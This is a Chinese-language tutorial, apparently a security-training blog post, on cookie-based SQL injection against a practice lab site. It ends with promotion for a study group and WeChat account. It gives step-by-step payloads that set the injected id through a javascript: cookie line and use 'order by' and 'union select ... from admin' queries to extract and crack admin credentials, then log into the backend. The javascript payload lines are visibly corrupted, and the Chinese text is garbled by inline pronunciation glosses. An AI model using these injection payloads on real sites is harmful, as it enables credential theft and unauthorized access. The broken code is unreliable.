經(jīng)過(guò)了我們前段時(shí)間的sql注入學(xué)習(xí)，今天我們來(lái)深入學(xué)習(xí)一下sql注入之cookie注入

首先我們打開靶場(chǎng)環(huán)境

隨便點(diǎn)開一篇文章

嘗試在結(jié)尾構(gòu)造一下 and 1=1

可見(jiàn)是使用了防注入的，但是目前我們是使用get方式提交的參數(shù),我們將id=171包括后面的全部刪除一下試試

顯示數(shù)據(jù)庫(kù)出錯(cuò)

這里存在cookie注入，首先我們恢復(fù)成原來(lái)的界面

然后我們下載一個(gè)ModHeader瀏覽器插件，將cookie設(shè)置為id的值。然后我們?cè)L問(wèn)

其去掉后面?id的網(wǎng)頁(yè)，發(fā)現(xiàn)并沒(méi)有顯示數(shù)據(jù)庫(kù)出錯(cuò)了

然后將IE欄清空，輸入

javascript:aler;id="+escape("171"));

這個(gè)語(yǔ)句就是構(gòu)造一個(gè)JS，把內(nèi)容插入到cookie里面去

返回出一個(gè)id=171

然后我們來(lái)手工注入一下他的字段數(shù)

javascript:aler;id="+escape("171 order by 10"));

可以知道他有10個(gè)字段數(shù)

然后我們里顯示他的值

javascript:aler;id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));

再刷新一遍發(fā)現(xiàn)顯示2，3

然后我們來(lái)破解賬號(hào)和密碼

javascript:aler;id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));

得出來(lái)MD5加密后密碼，解密后welcome，然后就可以登錄后臺(tái)了。

最后喜歡我文章的朋友請(qǐng)加圈子關(guān)注我們，私信關(guān)鍵詞：加群。（送免費(fèi)資料和優(yōu)惠券）

就會(huì)自動(dòng)分享給你群號(hào)。歡迎大家加入我們的安全大家庭。提高大家的安全意識(shí)，提升大家的網(wǎng)絡(luò)安全技能一直是我們的初衷和愿景，讓我們共同成為守護(hù)信息世界的"SaFeMAN"。

還有可以關(guān)注我們微信公眾號(hào)，在公眾號(hào)上輸入安界網(wǎng)，就可以關(guān)注到我們，領(lǐng)取資料和優(yōu)惠券！